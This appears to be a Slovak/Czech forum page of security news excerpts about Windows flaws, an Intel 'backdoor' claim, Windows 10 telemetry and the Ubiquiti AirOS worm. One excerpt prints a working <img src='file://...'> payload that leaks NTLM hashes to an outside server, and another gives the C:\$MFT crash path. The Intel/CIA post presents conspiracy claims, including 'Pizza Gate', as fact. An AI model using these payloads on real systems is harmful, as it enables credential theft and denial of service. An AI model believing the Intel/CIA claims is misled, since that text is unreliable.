Hľadať
 
 

Display results as :
 


Rechercher Advanced Search

júna 2017
PoUtStŠtPiSoNe
   1234
567891011
12131415161718
19202122232425
2627282930  

Calendar Calendar

Keywords

Kto je prítomný
Celkom je tu prítomný 1 užívateľ: 0 registrovaných, 0 skrytých a 1 anonymný.

nikto nie je prítomný

[ Zobrazi? celý zoznam ]


Najviac tu bolo súčasne prítomných 7 užívateľov dňa 7th decembra 2016, 14:16.
Windows dokáže zhodiť jednoriadkový HTML kód

26th máj 2017, 11:01 pre Admin

Windows dokáže zhodiť jednoriadkový HTML kód

Vo viacerých posledných verziách operačného systému Windows sa nachádza chyba, po zneužití ktorej celý systém efektívne zamrzne a nedá sa ďalej používať.Chyba sa dá pritom zneužiť mimoriadne ľahko a v závislosti na webovom prehliadači užívateľa aj jednoduchým HTML príkazom vloženým do stránky.Chyba sa nachádza v implementácii súborového systému NTFS používaného vo Windows, objavil ju ruský programátor.Týka sa narábania so špeciálnym súborom $MFT, Master File Table, v ktorom sú uložené metadáta o všetkých súboroch.Súbor má svoju cestu, napríklad na systémovom disku C:\$MFT, pričom prístup priamo k nemu je vo Windows korektne ošetrený. Programátor ale zistil, že k problémom prichádza pri pokuse o prístup k neexistujúcemu súboru s cestou obsahujúcou $MFT, napríklad C:\$MFT\File.

V takom prípade podľa jeho analýzy Windows globálne zamkne a následne chybne neodomkne prístup k súboru $MFT. Akékoľvek ďalšie operácie vyžadujúce prístup k $MFT, kam patria mnohé diskové operácie, sú zablokované. To tak postupne vyústi do zablokovania celého systému.Problém bol podľa objaviteľa prvýkrát prítomný vo Windows Vista. Programátor sa vo svojom oznámení nevenuje bližším informáciám napríklad o tom ktoré všetky …

[ Kompletné ?ítanie ]

Komentáre: 0

Procesory INTEL mají na úrovni hardwaru backdoor instalovaný přímo výrobcem

25th marca 2017, 13:02 pre Admin

Procesory INTEL mají na úrovni hardwaru backdoor instalovaný přímo výrobcem. Firewally i antiviry jsou ze hry ven.

Organizace Wikileaks včera uveřejnila novou sérii uniklých dokumentů Vault 7 a nově s názvem Dark Matter. O kauze Vault 7 jsme na AE News psali zde a toto je pokračování postupného publikování dokumentů, které odhalují praktiky CIA. Média si všímají hlavně toho, že CIA infikovala přímo ve výrobní továrně v Číně firmwary telefonů iPhone, a to již od roku 2008 a pokračuje to dodnes [1]. Přímo z továrny odcházejí iPhony infikované malwarem a nelze jej z telefonu smazat ani aktualizací novou verzí iOS. Koupíte rovnou iPhone s předinstalovaným špionážním malwarem od CIA. No, nekupte to!

Mně ovšem zaujalo něco úplně jiného. V dokumentech se objevila zmínka o programu Odin’s Eye [2] a všimli si jí lidé na boardu 4Chan, který stojí i za odhalením kauzy Pizza Gate, o které psal pan VK zde. V odkazech na Wikileaks vyhledávači už je projekt Odin’s Eye uveden u operativců CIA shromažďujících data ze špionáže [3], takže se dá očekávat, že za pár týdnů Wikileaks odhalí další bombu. V samotných dokumentech Wikileaks zatím podrobnosti o Odin’s Eye nejsou, ale odkazy na osoby a Odin’s Eye se již na Wikileaks nachází.

O systému IME se psalo už minulý rok, že je to velmi podivná …

[ Kompletné ?ítanie ]

Komentáre: 0

Microsoft zažalovaný za vážne problémy po upgrade na Windows 10

25th marca 2017, 12:52 pre Admin

Microsoft zažalovaný za vážne problémy po upgrade na Windows 10

Spoločnosť Microsoft bola v USA tento týždeň zažalovaná za vážne problémy, ktoré spôsobil trojici užívateľov upgrade z Windows 7 na Windows 10.
Microsoft už čelil viacerým žalobám za automatický užívateľom nevyžiadaný upgrade zo skorších verzií Windows na Windows 10.Aktuálny prípad ale nie je primárne o nevyžiadanom upgrade ale o problémoch, ktoré prechod na Windows 10 spôsobil na existujúcich počítačoch aj užívateľom upgradujúcim dobrovoľne.Hlavným dôvodom, za ktorý Microsoft žalujú, je strata dát kvôli tomuto upgradu, znefunkčnenie inštalovaného softvéru, dokonca potreba zakúpenia nového počítača a stratený čas a peniaze na riešenie týchto problémov.Aké poškodenie hardvéru majú žalujúci na mysli naznačujú niektoré informácie v žalobe, keď sa podľa nich pred upgradom nekontroluje či je pevný disk schopný vydržať záťaž pri inštalácii Windows 10 a veľa užívateľom sa ich disk pri inštalácii Windows 10 pokazil.Nie je tiež jasné, či sa trojica pokúsila vrátiť k predchádzajúcej verzii Windows. V žalobe ale túto možnosť kritizujú, pre prílišnú náročnosť a obmedzenú lehotu uplatnenia do maximálne 30 dní od upgradu.Microsoft sa spôsobom, podobou a kvalitou upgradu na Windows 10 dopustil podľa …

[ Kompletné ?ítanie ]

Komentáre: 0

Windows obsahuje zraniteľnosť. Do cudzieho konta sa prihlásite bez hesla

22nd marca 2017, 11:53 pre Admin

Windows obsahuje zraniteľnosť. Do cudzieho konta sa prihlásite bez hesla

Odhalili spôsob, vďaka ktorému sa dá jednoducho prihlásiť do cudzieho konta v rovnakom počítači. Netreba k tomu žiadne špeciálne nástroje, ani vedieť cudzie heslo - stačí len pár príkazov. Na hrozbu upozornil server Bleeping Computer.

Základným predpokladom pre úspešné vykonanie útoku je mať v cieľovom počítači s operačným systémom Windows vytvorený účet s administrátorskými oprávneniami. Potenciálny útočník okrem toho potrebuje fyzický prístup k počítaču alebo vzdialené pripojenie prostredníctvom protokolu RDP (Remote Desktop Protocol).Navyše, cieľový používateľ, do ktorého konta sa chce hacker dostať, musí byť stále prihlásený (uzamknutý). V reálnych podmienkach ide o situácie, keď zamestnanec odíde na prestávku, na obed, prípadne ak sa vôbec neodhlasuje ani po skončení pracovnej doby.

Príkazy obídu autentifikáciu
Za bežných okolností, je v prípade pokusu o prepnutie na cudzie používateľské konto v počítači požadované zodpovedajúce heslo. Vďaka štandardným vlastnostiam systému Windows sa to však dá jednoducho obísť.

Celý útok vychádza z funkcie, ktorá umožňuje každému používateľovi využiť CLI (command-line interface) príkazy na prepnutie na inú aktívnu používateľskú reláciu v …

[ Kompletné ?ítanie ]

Komentáre: 0

Nenechávejte váš Windows při aktualizaci bez dozoru

3rd decembra 2016, 18:20 pre Admin

Nenechávejte váš Windows při aktualizaci bez dozoru

Na trochu kuriózní bezpečnostní díru narazil bezpečnostní odborník Sami Laiho. Zjistil že stačí při aktualizaci Windows 10 zmáčknout klávesovou zkratku Shift + F10 a získáte kompletní přístup k systému. Tedy s administrátorským oprávněním a navíc obejdete i Windows BitLocker.Během aktualizace vám Shift + F10 zpřístupní příkazový řádek s administrátorským oprávněním, což je poměrně velký bezpečnostní problém. Aktualizace Windows totiž zaberou často i desítky minut a po tuto dobu musí být počítač aktivní, přitom s ním nemůžete nijak pracovat. Spousta lidí jej tak nechá bez dozoru a jde se věnovat jiné činnosti, přitom kdokoliv může přijít a dostat se do systému.

Po dobu instalace nového obrazu operačního systému totiž vše jede přes provizorní Windows PE (Preinstallation Environment). Právě k Windows PE se dostanete stishnutím Shift + F10.Zajímavé také je, že po dobu aktualizace, Windows deaktivuje šifrování pevného disku BitLocker. Takže potenciální útočník se dostane i k zašifrovaným souborům a to bez nutnosti nahrát do počítače jakýkoliv další software anebo připojit další zařízení. Útočník tak získá data aniž by vzbudil pozornost. Mimochodem problém s BitLocker se týká i předchozích verzí …

[ Kompletné ?ítanie ]

Komentáre: 0

Odcizení přihlašovacích údajů k Windows jen pomocí webové stránky

7th augusta 2016, 08:16 pre Admin

Odcizení přihlašovacích údajů k Windows jen pomocí webové stránky

Prokázaný a snadný způsob jak ukrást přihlašovací údaje k Windows.Ruský výzkumník ValdikSS zveřejnil malý exploit, která může ukrást vaše přihlašovací údaje k Windows (login a NTML hash) jen díky navštívení webové stránky. Problém je spojený se způsobem, jakým operační systém Windows zachází s "file:// URI". Jakmile je zaznamenán, operační systém pošle SMB NTLMSSP_NEGOTIATE požadavek k útoku na server, odhalujíc přihlašovací jméno, doménu a NTLM hash vašeho hesla.Webová stránka s plně funkčním exploitem je k dispozici zde hxxp://witch.valdikss.org.ru/ Nenavštěvujte tuto stránku z vašeho firemního počítače, vaše heslo může být odšifrováno.Stránka obsahuje obrázek <img src=”file://witch.valdikss.org.ru/a”>, který vyvolá SMB vyjednávání.Níže je screenshot pro samostatnou pracovní stanici:



Jak můžete vidět na tomto screenshotu, jednoduché heslo může být odhaleno z NTLM hashe během několika sekund. Shromážděné hashe se silnými hesly mohou být uloženy a dešifrovány později.Exploit funguje na všech moderních operačních systémech Windows, včetně Windows 10. A je úplně jedno, který prohlížeč používáte, protože požadavek …

[ Kompletné ?ítanie ]

Komentáre: 0

Windows 10 získava príliš veľa dát, ohrozuje bezpečnosť používateľov

25th júla 2016, 19:04 pre Admin

Windows 10 získava príliš veľa dát, ohrozuje bezpečnosť používateľov

Problémová je telemetria a nedostatočná informovanosť používateľov.Francúzsky úrad pre ochranu dát sa pozrel na Windows 10 a preskúmal, či dodržiava všetky náležitosti zodpovedajúce európskemu právu.Výsledné zistenia publikoval, pričom kritizoval najmä nevysvetľovanie pojmov pri inštalácii a neuvádzanie typu informácií, ktoré sa odosielajú pri komunikácii so servermi v USA.Odosiela viac, než je potrebné.Hlavné výčitky sa venujú záznamu telemetrie a PIN kódu. Microsoft uvádza, že základný režim telemetrie Basic vo Windows 10 je nevyhnutný pre fungovanie systému. Francúzski vyšetrovatelia ale namietajú, že sám Microsoft ponúka v podnikových edíciách Windows 10 prísnejší režim Security, ktorý iba zaisťuje stráženie bezpečnostných aktualizácií. Preto režim Basic nie je nevyhnutný a všetci používatelia Windows by mali mať možnosť nastaviť režim Security.

Ďalšia výčitka sa týka ochrany prihlasovania sa do počítača PIN kódom. Pri testovaní sa podarilo zadať bez obmedzenia 20 neúspešných pokusov, stačilo len po piatich pokusoch reštartovať počítač.Úrady odporúčajú maximum 25 pokusov za 24 hodín. Ak má ale niekto fyzický prístup k počítaču, je ochrana systému a súborov heslom často …

[ Kompletné ?ítanie ]

Komentáre: 0

Blackbird - tweaking privacy for Windows

24th máj 2016, 19:45 pre Admin

Blackbird - tweaking privacy for Windows



Blackbird was designed to alleviate spending hours on tweaking your privacy settings by using some known and less-known techniques to fully disarm Windows without leaving behind even the smallest possible footprint.There are other tools that claim to block Windows spying but they are cumbersome to use and not as powerful or are limited in scope. So the author took Windows apart, piece by piece, analyzed web traffic, system calls, file changes,etc., compared different configurations, designed and built a stand-alone tool and spent hundreds of hours on beta testing so anyone can use it and it gets the job done right.

Block Windows spyware, on both the application and network level, with dynamic filtering and without editing the HOSTS file or firewall settings as well as preventing diagnostic, password, contact, URL, SMS, handwriting, location, and P2P-update sharing.
Updated frequently and regularly, as long as Windows gets updates so will Blackbird.

Blackbird Features:

Disables OneDrive
Disables Cortana
Disables Bing-integration
Disables Wi-Fi Sense
Disables system-wide Telemetry on all Windows versions
Disables Xbox Live services
Disables web content evaluation / URL check-in ("SmartScreen")
Disables Windows Media Online DRM
Disables Windows P2P Update sharing
Disables all application metric …

[ Kompletné ?ítanie ]

Komentáre: 0

Motherfucker: virus v bezdrátových zařízeních Ubiquiti (AirOS)

17th máj 2016, 20:05 pre Admin

Motherfucker: virus v bezdrátových zařízeních Ubiquiti (AirOS)

Před měsícem byla popsána nová bezpečnostní díra ve všech typech zařízení AirOS. Ta umožňuje útočníkovi nahrát jakýkoliv soubor kamkoliv do souborového systému Wi-Fi zařízení bez znalosti přihlašovacích údajů.V pondělí 16. května byl konečně vydán opravný firmware verze 5.6.5, který tuto chybu řeší. Jak se vlastně dostane do nezabezpečeného zařízení?

Infekce zařízení: Jelikož exploit umožňuje nahrání souboru kamkoliv do souborového systému, virus si nahraje veřejný klíč SSH do routeru (bez nutnosti autentizace). Také zkopíruje sám sebe do zařízení. Přihlásí se pomocí SSH a nainstaluje se. Tedy rozbalí si tar, zapíše se do souboru rc.poststart a zapíše se do perzistentní paměti. Pak se restartuje.

Po restartu: Znovu se rozbalí z taru, a spustí soubor mother. Tato matka si nastaví firewall na HTTP/HTTPS – tím můžete poznat infikované zařízení. Dále inicializuje stažení příkazu curl a několika knihoven pomocí wget. Příkaz curl potřebuje pro své šíření a nevejde se do perzistentní paměti.Následně spustí search a začne skenovat adresní prostor. Pokud najde zařízení, které by mohlo být „airos“, zkusí na něj nahrát pomocí HTTP (HTTPS) opět svůj veřejný klíč a následně se zkusí …

[ Kompletné ?ítanie ]

Komentáre: 0

Prihlásenie

Zabudli ste svoje heslo?
 
Štatistiky
Je tu 3 registrovaných užívateľov.
Najnovším registrovaným užívateľom je russjelks03601.

Užívatelia zaslali celkom 37 príspevkov. v 33 tém